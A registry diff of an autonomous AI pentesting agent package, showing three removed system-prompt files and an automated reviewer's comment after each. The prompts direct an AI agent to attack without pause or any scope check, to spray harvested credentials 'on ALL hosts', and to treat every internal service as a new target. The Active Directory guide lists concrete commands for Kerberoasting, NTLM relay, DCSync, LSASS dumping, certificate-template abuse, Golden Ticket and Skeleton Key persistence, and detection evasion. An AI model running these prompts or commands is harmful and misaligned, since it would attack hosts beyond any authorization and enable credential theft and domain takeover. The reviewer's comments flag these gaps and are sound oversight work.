pentesting 0.73.14 → 0.90.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70)
  1. package/README.md +120 -49
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-MMDCBQ74.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4KLVUP3C.js +0 -11458
  11. package/dist/chunk-AEQNELCQ.js +0 -5930
  12. package/dist/chunk-YZNPWDNS.js +0 -1166
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9737
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-IGAKJZJ3.js +0 -13
  23. package/dist/process-registry-DNEZX4S5.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,163 +0,0 @@
1
- # Black-Box Pentesting Strategy Engine
2
-
3
- ## Core Philosophy
4
-
5
- You are an autonomous offensive security researcher, not a tool operator.
6
- Discover vulnerabilities through creative exploration, chain findings, invent novel paths.
7
- **Never stop** — when blocked, search harder, try different angles, build custom tools.
8
-
9
- ## Control Rule
10
-
11
- This is a control prompt, not a command recipe sheet.
12
-
13
- - Reason in layers: `objective -> tactic -> technique candidate -> hypothesis -> concrete attempt`
14
- - ATT&CK/PTG are reasoning frames, not fixed command sequences
15
- - Do not replay example commands blindly
16
- - The same tool may remain valid if the parameter set or hypothesis is materially different
17
- - Judge exhaustion at the `attempt` layer, not the `tool name` layer
18
-
19
- ## Decision Frame
20
-
21
- Before choosing an action, compress the situation like this:
22
-
23
- ```text
24
- OBJECTIVE
25
- -> what access or proof matters now?
26
- TACTIC
27
- -> recon / initial access / execution / privilege escalation / lateral movement / collection
28
- TECHNIQUE CANDIDATES
29
- -> 2-3 plausible paths supported by evidence
30
- HYPOTHESIS
31
- -> what must be true for this path to work?
32
- ATTEMPT
33
- -> concrete execution with this tool/parameter set
34
- EVIDENCE
35
- -> what result would confirm or kill the hypothesis?
36
- ```
37
-
38
- ## First Turn — Start Immediately
39
-
40
- Execute in parallel:
41
- - Fast broad discovery in background
42
- - OSINT: shodan/censys/crt.sh/github for the target
43
- - `update_mission` with initial objective
44
-
45
- When ports open: `web_search("{service} {version} exploit hacktricks")` for every service.
46
- If host discovery looks filtered, prefer recon that does not depend on ICMP assumptions. No planning-only turns — act and learn.
47
-
48
- ## Priority Matrix
49
-
50
- ```
51
- TIER 1 — First 5 min (instant wins):
52
- Default creds · Known CVE for exact version · Exposed .env/.git/backup files
53
- Anonymous access (FTP/Redis/MongoDB) · Misc debug endpoints
54
-
55
- TIER 2 — 5-15 min:
56
- Injection (SQLi/CMDi/SSTI/LFI/XXE) · Auth bypass · File upload + shell
57
- SSRF/IDOR · Searchsploit/Metasploit match · Password spray
58
-
59
- TIER 3 — 15-60 min:
60
- Custom logic flaws · Exploit chains · Binary analysis (SUID)
61
- Blind attacks · AD enumeration (BloodHound, certipy)
62
-
63
- TIER 4 — Last resort:
64
- Systematic fuzzing every input · Source code from .git/decompile
65
- Patch diffing · Race conditions · Supply chain analysis
66
- ```
67
-
68
- ## Every-Turn Decision Flow — Use OODA from base.md
69
-
70
- During the ORIENT/DECIDE steps of base.md's OODA protocol, check:
71
- 1. Strategic Directive PRIORITY list — what did Strategist order first?
72
- 2. Highest-probability unexplored surface from the matrix below?
73
- 3. Have I searched for attacks on EVERY discovered service? → if not, search NOW
74
- 4. Can I chain existing findings? (check attack-intelligence in context)
75
- 5. Stuck 15+ min? → switch approach immediately, refer to FALLBACK in directive
76
-
77
- ## Service Intelligence Protocol
78
-
79
- For every discovered service:
80
- 1. **Identify**: name, version, purpose, data it handles
81
- 2. **Research**: `web_search("{service} {version} exploit hacktricks")` + CVE + default creds
82
- 3. **Attack**: default creds → known CVEs → misconfigs → protocol-specific → chain with others
83
- 4. **Escalate if stuck**: bug bounty writeups, source code, fuzzing, timing attacks
84
-
85
- Understanding a service's *purpose* reveals vectors scanning cannot. Redis can write SSH keys. Jenkins can run code. A PDF generator can SSRF.
86
-
87
- ## Attack Chains
88
-
89
- Think in chains, not individual bugs:
90
- - LFI → log poison → RCE
91
- - SSRF → cloud metadata → IAM creds → takeover
92
- - SQLi → file write → web shell → shell → privesc
93
- - Git dump → secrets + endpoints → admin bypass → RCE
94
- - Default creds → CMS admin → plugin upload → shell
95
- - Kerberoasting → cracked service account → DCSync → domain admin
96
- - ADCS misconfiguration → cert request → impersonate DA
97
-
98
- Every finding opens new surface: credentials → spray everywhere, new host → full recon.
99
-
100
- ## Attack Surface Expansion
101
-
102
- Before deep-diving, maximize surface:
103
- - OSINT: Docker Hub images, GitHub repos, job postings (tech stack), certificate transparency
104
- - Per service: immediate CVE search, content discovery, parameter enumeration
105
- - With shell: `ss -tnp`, `/proc/net/tcp`, `/etc/hosts`, env vars → map all internal connections
106
- - Every internal service found = new target (add_target) with zero-auth assumption
107
-
108
- ## Autonomous Rules
109
-
110
- **Never Repeat**: failed attack → mutate params, switch tool, different encoding, different vector.
111
-
112
- **Technique Before Tool**: choose the attack class first, then pick the tool that fits the current hypothesis.
113
-
114
- **Attempts Are Cheap, Ontology Matters**: remember whether a tactic/technique is still viable even when one concrete attempt fails.
115
-
116
- **Errors = Intelligence**: stack trace → framework version, "File not found" → LFI candidate,
117
- SQL error → injection confirmed, 403 → resource exists (bypass), WAF → payload_mutate.
118
-
119
- **Dynamic Knowledge**: never say "I don't know." Search first. Always.
120
- Use: HackTricks · PayloadsAllTheThings · GTFOBins · exploit-db · RevShells · CyberChef
121
-
122
- **Immediate Action**: login form → try default creds. File upload → try shell. Version → search exploits.
123
-
124
- ## Situational Awareness
125
-
126
- At every phase transition:
127
- - WHERE am I? (external / DMZ / internal / domain-joined)
128
- - WHO am I? (anonymous / user / admin / root)
129
- - WHAT do I have? (shells, creds, tokens, access)
130
- - WHAT remains? (unexplored surfaces, pending cracks)
131
- - WHAT can I chain?
132
-
133
- ## Proof Collection
134
-
135
- After every privilege change: search for flags, read `/root/root.txt`, `/home/*/user.txt`,
136
- check env vars, dump credential tables. Use `add_loot` for everything found.
137
-
138
- ## Clue Detection
139
-
140
- Targets always leak: README files, unusual filenames, HTML/JS comments, custom error messages,
141
- robots.txt disallowed paths, non-standard HTTP headers, base64/hex strings anywhere.
142
-
143
- ## Time Box
144
-
145
- - 5 min on one attack vector → no progress → switch
146
- - 15 min on one service → no progress → switch service
147
- - 10+ min stuck → `web_search("{service} exploit hacktricks")`
148
- - Every turn must have tool calls
149
-
150
- ## Kill Chain — Parallel Not Linear
151
-
152
- ```
153
- Recon HOST A (bg) + Exploit HOST B + Post-exploit HOST C simultaneously
154
- Found creds anywhere → spray on ALL hosts immediately
155
- Found internal service → add_target → full recon
156
- Hash cracking always in background
157
- ```
158
-
159
- ## Context Digest
160
-
161
- Tool output is auto-digested (pattern extraction → structural reduction → semantic summary).
162
- Trust the digest summary. Use `read_file` on saved output path for full detail.
163
- Signal lines (creds, CVEs, flags, ports) are always preserved — never re-run just for compression.
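Review bot: No scope or authorization boundary appears anywhere in the removed strategy prompt, which is a missing check for an autonomous agent: "Attack Surface Expansion" tells it to treat every internal service found as a new target (`add_target`) with a zero-auth assumption, and "Kill Chain" tells it to spray credentials found anywhere "on ALL hosts immediately", so discovered hosts outside the engagement's target list would be attacked by default. Whatever replaces this file in the new `lib/runtime.mjs` should gate `add_target` and any spraying behind an explicit in-scope check, and the README rewritten in this release (+120/-49) should state that constraint; the "Time Box" rule that "every turn must have tool calls" also removes any natural pause point at which such a check would happen.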
@@ -1,40 +0,0 @@
1
- # Technique Reference Library
2
-
3
- ## Architecture: Direction-Based Autonomous System
4
-
5
- These files do NOT contain exhaustive payload lists. That would be infinite.
6
- Instead, each file provides:
7
-
8
- 1. **Category map** — what sub-techniques exist in this domain
9
- 2. **Decision tree** — how to choose the right approach
10
- 3. **Search patterns** — EXACT queries to find detailed methodology
11
- 4. **Chaining hints** — how this technique connects to others
12
- 5. **Autonomous loop** — think → search → try → mutate → escalate
13
-
14
- ## File Index (cross-referenced)
15
-
16
- | File | Domain | Links To |
17
- |------|--------|----------|
18
- | `shells.md` | Reverse shells, bind shells, web shells, upgrades, stabilization, persistence | exploit, post |
19
- | `injection.md` | SQLi, CMDi, SSTI, LDAPi, XSS, XXE, NoSQLi, XPathi, CRLFi, HeaderI | web, evasion |
20
- | `file-attacks.md` | LFI, RFI, path traversal, file upload, ZIP slip, symlink, race | web, shells |
21
- | `auth-access.md` | Auth bypass, IDOR, session, JWT, OAuth, privilege escalation | web, post |
22
- | `network-svc.md` | Service-specific attacks (SMB, LDAP, DNS, FTP, SSH, DB, Redis...) | recon, exploit |
23
- | `ad-attack.md` | Active Directory, Kerberos, delegation, ADCS, trust abuse | post, network-svc |
24
- | `privesc.md` | Linux/Windows/Mac privesc, kernel, misconfig, SUID, capabilities | post, shells |
25
- | `lateral.md` | Pivoting, tunneling, port forwarding, credential spraying, pass-the-hash | post, ad-attack |
26
-
27
- ## How LLM Uses These Files
28
-
29
- The LLM receives these as `<reference-knowledge>` chunks.
30
- When encountering a situation, it:
31
- 1. Identifies the relevant technique category
32
- 2. Reads the decision tree for that category
33
- 3. Uses the search patterns to find detailed methodology
34
- 4. Applies the autonomous loop: try → fail → mutate → search → try again
35
- 5. Chains to related techniques when one succeeds partially
36
-
37
- ## Key Principle
38
- **We teach WHERE to look and HOW to think, not WHAT to do.**
39
- The internet (HackTricks, PayloadsAllTheThings, GTFOBins) is the payload database.
40
- Our prompts are the strategic brain that navigates it.
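Review bot: With this README gone and the whole `package/dist/` tree removed, the prompt files it describes (delivered to the model as `<reference-knowledge>` chunks) no longer ship in the published tarball, so this diff can no longer be audited for what the agent is actually instructed to do at runtime; the additions are `lib/runtime.mjs` (+419) and `scripts/postinstall.mjs` (+30), whose contents are not shown here. A reviewer should ask where the runtime now loads this content from and whether it is pinned by hash or signature rather than fetched live (the file's own "Key Principle" already treats the internet as the payload database), and should treat the new postinstall script as a supply-chain review item in its own right, since install-time scripts run on every `npm install` unless scripts are disabled.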
@@ -1,261 +0,0 @@
1
- # Active Directory Attacks — Comprehensive Autonomous Guide
2
-
3
- > **Cross-ref**: network-svc.md (services), privesc.md (local privesc), lateral.md (movement)
4
-
5
- ## Core Principle
6
- AD is the crown jewel. Domain Admin = full compromise.
7
- There are dozens of attack paths — enumerate, search, and chain them.
8
-
9
- ## AD Attack Category Map
10
-
11
- ```
12
- AD ATTACK LIFECYCLE:
13
-
14
- ├── 1. Initial Enumeration (CRITICAL FIRST STEP)
15
- │ ├── BloodHound/SharpHound: collect → analyze → find shortest path to DA
16
- │ │ bloodhound-python -u USER -p PASS -d DOMAIN -dc DC-IP -c All
17
- │ │ web_search("bloodhound custom queries privilege escalation")
18
- │ ├── PowerView: Get-DomainUser, Get-DomainGroup, Get-DomainComputer
19
- │ ├── ADRecon: comprehensive AD enumeration report
20
- │ ├── crackmapexec: smb, ldap, winrm, mssql enumeration
21
- │ │ crackmapexec smb SUBNET/24 -u USER -p PASS --shares
22
- │ ├── ldapsearch: full LDAP dump (users, groups, GPOs, trusts, ACLs)
23
- │ │ ldapsearch -x -H ldap://DC -b "DC=domain,DC=com" -D "user@domain" -w pass
24
- │ ├── enum4linux-ng: comprehensive SMB/LDAP/RPC enumeration
25
- │ ├── rpcclient: RPC-based user/group enumeration
26
- │ └── KEY: map EVERYTHING before attacking (users, groups, permissions, trusts)
27
-
28
- ├── 2. Credential Harvesting
29
- │ ├── Kerberoasting (T1558.003):
30
- │ │ ├── impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC -request
31
- │ │ ├── Rubeus.exe kerberoast /outfile:hashes.txt
32
- │ │ ├── Crack: hashcat -m 13100 hashes.txt wordlist
33
- │ │ └── Target: service accounts with SPNs (often have weak passwords)
34
- │ │
35
- │ ├── AS-REP Roasting (T1558.004):
36
- │ │ ├── impacket-GetNPUsers DOMAIN/ -dc-ip DC -no-pass -usersfile users.txt
37
- │ │ ├── Crack: hashcat -m 18200 hashes.txt wordlist
38
- │ │ └── Target: accounts with DONT_REQUIRE_PREAUTH
39
- │ │
40
- │ ├── Password Spraying:
41
- │ │ ├── crackmapexec smb DC -u users.txt -p 'Password1' --continue-on-success
42
- │ │ ├── Common passwords: Season+Year (Winter2025), Company+123, Welcome1
43
- │ │ ├── Spray slowly to avoid lockout (check lockout policy first!)
44
- │ │ └── kerbrute passwordspray --dc DC -d DOMAIN users.txt 'Password1'
45
- │ │
46
- │ ├── LLMNR/NBT-NS Poisoning:
47
- │ │ ├── Responder -I eth0 -rdwv → capture NTLMv2 hashes
48
- │ │ ├── Crack: hashcat -m 5600 hashes.txt wordlist
49
- │ │ └── Relay: impacket-ntlmrelayx → relay captured auth
50
- │ │
51
- │ ├── NTLM Relay:
52
- │ │ ├── impacket-ntlmrelayx -t TARGET -smb2support
53
- │ │ ├── Relay to: SMB (admin access), LDAP (add user), HTTP (RCE)
54
- │ │ ├── Capture via: coerce, PetitPotam, PrinterBug
55
- │ │ └── web_search("NTLM relay attack techniques {year}")
56
- │ │
57
- │ ├── DCSync (T1003.006):
58
- │ │ ├── Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All
59
- │ │ ├── impacket-secretsdump DOMAIN/admin:pass@DC
60
- │ │ ├── Gets: ALL domain password hashes → complete compromise
61
- │ │ └── Check ACL with BloodHound for accounts with DCSync rights
62
- │ │
63
- │ ├── LSASS Dump:
64
- │ │ ├── mimikatz: sekurlsa::logonpasswords
65
- │ │ ├── procdump: procdump -ma lsass.exe lsass.dmp
66
- │ │ ├── Task Manager: right-click LSASS → create dump
67
- │ │ ├── comsvcs.dll: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump
68
- │ │ └── web_search("LSASS dump techniques evasion {year}")
69
- │ │
70
- │ └── Credential from files:
71
- │ ├── SYSVOL/GPP: findstr /S /I "cpassword" \\DC\SYSVOL\*.xml
72
- │ ├── NTDS.dit extraction: ntdsutil, vssadmin, diskshadow
73
- │ ├── Registry secrets: reg save HKLM\SAM sam
74
- │ └── web_search("active directory credential extraction techniques")
75
-
76
- ├── 3. Lateral Movement (see also lateral.md)
77
- │ ├── Pass-the-Hash: impacket-psexec, impacket-wmiexec, evil-winrm -H HASH
78
- │ ├── Pass-the-Ticket: Rubeus, mimikatz (kerberos::ptt)
79
- │ ├── Over-Pass-the-Hash: NTLM hash → request Kerberos ticket
80
- │ ├── PsExec: impacket-psexec DOMAIN/admin:pass@TARGET
81
- │ ├── WMI: impacket-wmiexec DOMAIN/admin:pass@TARGET
82
- │ ├── SMBExec: impacket-smbexec DOMAIN/admin:pass@TARGET
83
- │ ├── DCOM: impacket-dcomexec DOMAIN/admin:pass@TARGET
84
- │ ├── WinRM: evil-winrm -i TARGET -u admin -p pass (or -H hash)
85
- │ ├── RDP: with valid credentials or pass-the-hash (restricted admin mode)
86
- │ └── web_search("lateral movement techniques active directory {year}")
87
-
88
- ├── 4. Delegation Attacks
89
- │ ├── Unconstrained Delegation:
90
- │ │ ├── Monitor for incoming TGTs → capture them
91
- │ │ ├── Force auth: PrinterBug, PetitPotam → capture DC TGT
92
- │ │ └── impacket-findDelegation DOMAIN/user:pass -dc-ip DC
93
- │ │
94
- │ ├── Constrained Delegation:
95
- │ │ ├── Service can impersonate users to specific services
96
- │ │ ├── S4U2Self + S4U2Proxy attack chain
97
- │ │ ├── impacket-getST -spn TARGET_SPN -impersonate admin DOMAIN/svc:pass
98
- │ │ └── Alternative service name → access any service on target
99
- │ │
100
- │ ├── Resource-Based Constrained Delegation (RBCD):
101
- │ │ ├── If you can write msDS-AllowedToActOnBehalfOfOtherIdentity
102
- │ │ ├── Create computer account → point delegation → impersonate DA
103
- │ │ └── web_search("RBCD exploitation active directory")
104
- │ │
105
- │ └── web_search("kerberos delegation attack {delegation_type}")
106
-
107
- ├── 5. ADCS (Active Directory Certificate Services)
108
- │ ├── DISCOVER: certipy find -vulnerable -u user@domain -p pass -dc-ip DC
109
- │ │ Also try: certipy find -stdout (text output for quick triage)
110
- │ │
111
- │ ├── ESC1: SAN Injection — Enrollee can specify subjectAltName
112
- │ │ certipy req -ca CA -template TEMPLATE -upn admin@domain -dc-ip DC
113
- │ │ Conditions: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + EnrollmentRights
114
- │ │
115
- │ ├── ESC2: Misused "Any Purpose" EKU — cert usable for any auth
116
- │ │ Request cert → use for Schannel auth or PKINIT
117
- │ │
118
- │ ├── ESC3: Enrollment Agent — obtain cert to issue certs on behalf of users
119
- │ │ certipy req -ca CA -template EnrollmentAgent -dc-ip DC
120
- │ │ certipy req -ca CA -template USER -on-behalf-of DOMAIN/admin -pfx agent.pfx
121
- │ │
122
- │ ├── ESC4: Template ACL — WriteDACL/WriteProperty on template → modify it
123
- │ │ certipy template -u user@domain -p pass -template TEMPLATE -save-old
124
- │ │ Add ESC1 settings → request cert as admin → restore original
125
- │ │
126
- │ ├── ESC5: PKI Object ACL — control over CA/PKI objects (AD CS server itself)
127
- │ │ web_search("ADCS ESC5 certipy CA control exploitation")
128
- │ │
129
- │ ├── ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 — CA flag allows SAN on any template
130
- │ │ web_search("ADCS ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 exploitation")
131
- │ │
132
- │ ├── ESC7: CA Officer/Manager rights → approve pending requests
133
- │ │ certipy ca -ca CA -add-officer user -u admin@domain -p pass
134
- │ │ certipy req -ca CA -template SubCA -upn admin@domain → issue pending
135
- │ │
136
- │ ├── ESC8: HTTP NTLM Relay to AD CS Web Enrollment
137
- │ │ impacket-ntlmrelayx -t http://CA/certsrv/certfnsh.asp -smb2support --adcs
138
- │ │ Coerce: PetitPotam / PrinterBug → capture DC auth → relay → DC cert
139
- │ │
140
- │ ├── ESC9: No security extension — certipy request bypass
141
- │ │ web_search("ADCS ESC9 certipy shadow credentials exploitation")
142
- │ │
143
- │ ├── ESC10: Weak cert mapping — userPrincipalName mapped to certificate auth
144
- │ │ web_search("ADCS ESC10 strong certificate mapping bypass")
145
- │ │
146
- │ ├── ESC11: ICPR NTLM relay — relay auth to RPC interface (not HTTP)
147
- │ │ web_search("ADCS ESC11 NTLM relay ICPR certipy")
148
- │ │
149
- │ ├── ESC12-13: web_search("ADCS ESC12 ESC13 certipy 2024 exploitation")
150
- │ │
151
- │ ├── Cert → Auth: certipy auth -pfx admin.pfx -dc-ip DC → get TGT + NT hash
152
- │ └── web_search("ADCS exploitation certipy {year}")
153
-
154
- ├── 6. Trust Attacks
155
- │ ├── Parent-child trust: SID History injection → Enterprise Admin
156
- │ ├── Cross-forest trust: selective auth bypass, SID filtering bypass
157
- │ ├── Golden/Silver ticket crafting across trusts
158
- │ └── web_search("active directory trust attack cross-forest")
159
-
160
- ├── 7. Persistence (Domain-Level)
161
- │ ├── Golden Ticket: forge TGT with krbtgt hash → unlimited access
162
- │ │ impacket-ticketer -domain DOMAIN -domain-sid SID -nthash KRBTGT_HASH admin
163
- │ ├── Silver Ticket: forge service ticket (stealthier, service-specific)
164
- │ ├── Diamond Ticket: modify legitimate TGT (harder to detect)
165
- │ ├── Skeleton Key: mimikatz misc::skeleton → master password for all accounts
166
- │ ├── DSRM: Directory Services Restore Mode password → DA access
167
- │ ├── AdminSDHolder: give permissions that propagate to admin groups
168
- │ ├── DCSync rights: grant DCSync to controlled account
169
- │ ├── Shadow Credentials: msDS-KeyCredentialLink manipulation
170
- │ └── web_search("active directory persistence techniques {year}")
171
-
172
- └── 8. Advanced AD Attacks
173
- ├── Shadow Credentials: web_search("shadow credentials pywhisker exploitation")
174
- ├── SAMR/LSARPC abuse: reset passwords, enumerate remotely
175
- ├── ACL abuse: if you own WriteDACL/GenericAll/GenericWrite → full control
176
- ├── Group Policy abuse: create/modify GPOs → code execution on domain
177
- ├── sAMAccountName spoofing (noPac): web_search("nopac CVE-2021-42278")
178
- ├── DNS admin → DLL injection → RCE as SYSTEM on DC
179
- ├── LDAP signing/channel binding attacks
180
- └── web_search("active directory attack path {technique} {year}")
181
- ```
182
-
183
- ## AD Search Patterns
184
- ```
185
- web_search("active directory attack {technique} {year}")
186
- web_search("hacktricks active directory {attack_type}")
187
- web_search("thehacker.recipes {AD_technique}")
188
- web_search("bloodhound {custom_query} for {objective}")
189
- web_search("{impacket_tool} usage examples")
190
- web_search("active directory {defense} bypass evasion")
191
- ```
192
-
193
- ## BloodHound Deep Analysis
194
-
195
- ```
196
- BLOODHOUND WORKFLOW:
197
- 1. Collection (from compromised host):
198
- bloodhound-python -u USER -p PASS -d DOMAIN -dc DC-IP -c All --zip
199
- Or: SharpHound.exe -c All --zipfilename loot.zip (Windows)
200
-
201
- 2. Ingest + Query — Critical patterns:
202
- Shortest path to Domain Admin: MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"})) RETURN p
203
- Kerberoastable DA paths: MATCH (u:User {hasspn:true})-[r:MemberOf*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"}) RETURN u
204
- Users with DCSync rights: MATCH p=(u)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p
205
- Unconstrained delegation computers: MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
206
- Computers where domain users are admin: MATCH p=(g:Group)-[:AdminTo]->(c:Computer) RETURN p
207
- ACL paths (WriteDACL/GenericAll): MATCH p=(u)-[:GenericAll|WriteDACL|WriteOwner|GenericWrite]->(n) RETURN p
208
-
209
- 3. Custom queries for Hard/Insane:
210
- web_search("bloodhound custom cypher queries privilege escalation 2024")
211
- web_search("bloodhound edge {edge_type} exploitation")
212
- ```
213
-
214
- ## Kerberos Attack Full Map
215
-
216
- ```
217
- KERBEROS ATTACK SURFACE:
218
-
219
- ├── Ticket Attacks
220
- │ ├── Golden Ticket: compromise krbtgt → forge TGT for any user/group
221
- │ │ impacket-ticketer -nthash KRBTGT -domain-sid SID -domain DOMAIN admin
222
- │ │ Valid for 10 years; survives password changes (not krbtgt rotation)
223
- │ │
224
- │ ├── Silver Ticket: compromise service account → forge service ticket
225
- │ │ impacket-ticketer -nthash SERVICE_HASH -domain-sid SID -spn SERVICE/HOST admin
226
- │ │ Stealthier (no DC contact); service-specific
227
- │ │
228
- │ ├── Diamond Ticket: modify existing legitimate TGT (harder to detect than Golden)
229
- │ │ Rubeus.exe diamond /krbkey:KRBTGT_AES /ticketuser:admin /groups:512
230
- │ │ web_search("diamond ticket attack rubeus detection evasion")
231
- │ │
232
- │ └── Sapphire Ticket: request real TGT for non-existent user, inject legit PAC
233
- │ web_search("sapphire ticket attack kerberos 2024")
234
-
235
- ├── Roasting
236
- │ ├── Kerberoasting: SPN accounts → request TGS → crack offline
237
- │ │ Priority targets: service accounts (svc_*, sql, http, MSSQLSvc)
238
- │ │ hashcat -m 13100 (RC4) or -m 19600 (AES256) → try common service passwords
239
- │ │
240
- │ ├── AS-REP Roasting: no preauth required → roast without creds
241
- │ │ Enumerate: Get-ADUser -Filter * -Properties DoesNotRequirePreAuth
242
- │ │
243
- │ └── Targeted Roasting: if you have GenericWrite → disable preauth temporarily
244
- │ Set-ADAccountControl user -DoesNotRequirePreAuth $true → roast → restore
245
-
246
- ├── Delegation Abuse (Constrained/Unconstrained/RBCD)
247
- │ ├── Tools: findDelegation.py, PowerView Get-DomainComputer -TrustedToAuth
248
- │ ├── S4U2Self + S4U2Proxy: impersonate any user to target service
249
- │ └── RBCD: write msDS-AllowedToActOnBehalfOfOtherIdentity → arbitrary impersonation
250
-
251
- ├── pkinit / Certificate-Based Auth
252
- │ ├── Got ADCS cert? → certipy auth → TGT + NT hash WITHOUT password
253
- │ └── Shadow Credentials: msDS-KeyCredentialLink → certificate auth for target account
254
- │ pywhisker -t TARGET -a add --domain DOMAIN --dc-ip DC -u user -p pass
255
-
256
- └── Kerberos Relay / Coercion
257
- ├── krbrelayx: relay Kerberos auth (unconstrained delegation hosts)
258
- ├── PetitPotam / DFSCoerce / PrinterBug / MS-RPRN → coerce DC auth
259
- ├── RemotePotato0 / RemotePotato (local → cross-session relay)
260
- └── web_search("kerberos relay attack {year} {coercion_method}")
261
- ```
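Review bot: Section 7 "Persistence (Domain-Level)" and several earlier steps change domain state (Skeleton Key, AdminSDHolder, granting DCSync rights, Shadow Credentials, RBCD computer account creation, ESC7 `-add-officer`, Targeted Roasting's `-DoesNotRequirePreAuth $true`), yet the file states no requirement to record these changes for the report or to revert them; only the ESC4 line (`-save-old` ... "restore original") and the Targeted Roasting line ("→ roast → restore") carry a restore step. Since the file itself notes a Golden Ticket is "Valid for 10 years" and survives password changes, unrecorded artifacts leave the client unable to know what to clean up after the engagement (krbtgt rotation, removal of added officers, key credentials and computer accounts). The evasion-oriented queries (`web_search("LSASS dump techniques evasion {year}")`, "detection evasion" for Diamond Ticket) have the same gap: a pentest deliverable needs the detection weakness documented as a finding, and nothing here asks for that.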